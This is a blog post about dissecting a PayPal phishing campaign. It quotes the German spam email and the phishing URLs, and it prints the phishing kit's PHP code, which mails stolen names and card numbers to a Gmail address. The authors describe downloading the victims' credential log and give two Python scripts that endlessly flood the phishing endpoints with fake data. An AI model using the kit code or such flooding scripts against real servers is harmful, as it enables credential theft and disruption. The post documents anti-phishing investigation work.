Pwning a paypal phishing site

Recently, a colleague sent us a link to a paypal phishing site. After we had a look at the website, we started a “counter-attack”.

What is phishing

So what does ‘phishing’ mean? It’s a kind of a social attack, where the victim is tricked into divulging personal information (often login credentials, credit card data, and so on). Those sites often imitate the websites of big companies like paypal, google, ebay. The criminals buy similiar looking domains so that the url looks similiar to the original one. A common way to get the victims to those malicous pages is to sent a huge amount of spam mails. However, phishing can also be done using XSS attacks (e.g. create a new UI-element which asks for the credentials or change the “action” attribute of a form).

The spam mail

The attackers decided to use the common method to spread their phishing page. We received the following (german) spam mail:

1
2
3
4
5
6
7
8
9
10
11
12

Sehr geehrter PayPal© Kunde,
Als Teil unserer Sicherheitsmaßnahmen überprüfen wir die Aktivität im
PayPal System regelmäßig. Während einer Untersuchung haben wir eine
Unzulänglichkeit in Ihren Rechnungen entdeckt.
 
Bitte loggen Sie sich sobald wie möglich in Ihr Konto ein um weitere Begrenzungen zu vermeiden. Einloggen [http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/]
https://www.paypal.de/de/cgi-bin/webscr?cmd=_login-submit [http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/index.php?vclhwozmgr=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy]
 
Wir danken Ihnen fü Ihre Kooperation. Bitte verstehen Sie dass diese 
Sicherheitsmaßnahmen als Protektion für Sie und Ihr Konto unternommen
werden. Wir entschuldigen uns für die Unannehmlichkeiten die wir Ihnen
verursachen.

The email states, that paypal checks the account activity as a part of their security measures and that they’ve noticed unnormal activities in your account. You’re told to login to paypal using the given link as soon as possible.

Despite the fact, that the email is lacking any orthography or any complementary close, it’s sounds “convincing” and you’re tempted to login to your account right now. Unexperienced internet users (like your grandma) maybe would enter their login credentials on the phishing page…

The website

Let’s continue with the phishing page. The attackers sent the following two url in their phishing email:

1
2

http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/
http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/index.php?vclhwozmgr=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy

The first question which should come up in your mind is: Why would paypal use a third-party domain? Ok - Maybe that’s a new special marketing feature ;)

If you have a fast look at the middle/end of the url, you’re tempted to read “https://www.paypal.de”. In fact, there’s “https.//www.paypal.com” (notice the difference between ‘:’ and ‘.’).

At this point we can assume that the attackers set up or hacked the domain/website “victorlipkin.com”. We informed the webmaster of this website about this probable hack, but we haven’t received any response yet.

Using ‘curl’ or ‘wget’ we can safely view/download the websites sourcecode. Modern browsers like Google Chrome should display a warning that this page may contain malicious content and stop the redirection, but it takes google some days/hours to add this site to it’s database.

Otherwise we’ll be redirected to a new location:

1

http://207.218.205.218/~degrapa/utilerias/gateway/online/index.php?cmd=ID=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy

This page was a good-looking clone of the paypal login/register page. It came with some slightly modifications like the need to enter your credit card details during the registration process. Usually paypals asks for that data after the registration is completed.

Again you should ask yourself:

  • Why does paypal serve a website without a domain?

  • Why does it ask for credit card data during the registration process?

  • Why is there no “green” SSL sign?

Nevertheless there are people which still think that this is a valid paypal website :(

The attackers mistake

In our opinion, this is the most funniest part of this story. The attacker forgot to disable directory listing on his server and thus allowed us to have a closer look:

1
2
3
4
5
6

Index of /~degrapa/utilerias
Parent Directory
gateway/
phpmailer/
security.tgz
Apache Server at 207.218.205.218 Port 80

The sourcecode

We decided to download the ‘security.tgz’ file and extract it. There were three php files which were responsible for the phishing attack. The rest was used to re-create the paypal design. This webapplication was designed to steal the vcitims login credentials and/or credit data and store it in two seperate text-files just as well sending them to a specific gmail-adress.

The most interesting part looked like this:

1
2
3
4
5
6
7
8

[...]
$from = "From: admin@localhost.com";
$subj = "".$_POST['first_name']." ".$_POST['lname']." - ".$_POST['ccnumber']."";
mail("xxxxxxxxxxx@gmail.com", $subj, $message);
$pula = fopen ("xxxxxx.txt" , "a");
fwrite ($pula , $message);
fclose ($pula);
header("Location: success.html");

Boom: The logfile was publicly accessible, so we downloaded a copy of it. After having a quick look into the two logfiles we were shocked:

  • ~ 35 people entered their credit card details
  • ~ 337 people entered their login credentials

We thought that phishing would not be that profitable anymore, but this proofed that we were wrong.

The counterattack

The attacker did not use a captcha or any rate-limiting. That’s why we wrote a short python script which submits some fake login details:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

#!/usr/bin/python2.7
 
import random
import urllib2
import urllib
 
SPAMURL="http://207.218.205.218/~degrapa/utilerias/gateway/online/username.php"
 
def randstr(leng):
    res = ""
    for i in xrange(0,leng):
        res = res + str(chr(random.randint(65,125)))
    return res
def sendSpamReq(url):
    data = urllib.urlencode({'login_email':randstr(8)+"@"+randstr(3)+".de",
                             'login_password':randstr(12)
   })
    urllib2.urlopen(urllib2.Request(url,data))
count = 0
while True: 
    count=count+1
    try:
        sendSpamReq(SPAMURL)
        print "["+str(count)+"] Success"
    except:
        print "["+str(count)+"] Failed"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

#!/usr/bin/python2.7
 
import random
import urllib2
import urllib
 
SPAMURL="http://207.218.205.218/~degrapa/utilerias/gateway/online/post.php"
 
def randstr(leng):
    res = ""
    for i in xrange(0,leng):
        res = res + str(chr(random.randint(65,125)))
    return res
def randdobdd():
    return random.randint(0,31)
def randdobmm():
    return random.randint(0,12)
def randdobyy():
    return random.randint(1950,2000)
def randzip():
    return random.randint(10000,99999)
    
def sendSpamReq(url):
    data = urllib.urlencode({'first_name':randstr(10),
                            'last_name':randstr(15),
                            'dob_dd':randdobdd(),
                            'dob_mm':randdobmm(),
                            'dob_yyyy_':randdobyy(),
                            'address1':randstr(5),
                            'address2':randstr(7),
                            'city': randstr(20),
                            'zip': randzip(),
                            'cardIssuer':randstr(10),
                            'codel':randstr(5),
                            'kto_number':randstr(20),
                            'cardnumber':randstr(50),
                            'expdate_month':randdobmm(),
                            'expdate_year':randdobyy(),
                            'cvv2_number':randstr(5)
   })
    urllib2.urlopen(urllib2.Request(url,data))
count = 0
while True: 
    count=count+1
    try:
        sendSpamReq(SPAMURL)
        print "["+str(count)+"] Success"
    except:
        print "["+str(count)+"] Failed"

That script should flood the logfile and the attackers inbox. After some hours the attacker decided to remove his phishing page from the internet. Maybe he had noticed that something went “wrong” ;)

Emailing all victims

We thought that it would be our responsibility to inform the victims. In the end it took us some hours to notify all 300 victims (we removed duplicate entries first).

During the process, we saw some emails like: paypal-payment@company.com. Some companies need to review their security policies :(

Update: 11.03.2013

About 10% if the victims replied to our information email and thanked for the hint. Some of them said that they’ve noticed the phishing attack after one failed login attempt and that they’ve changed the password immediately. Otheres were quiet surprised about the information.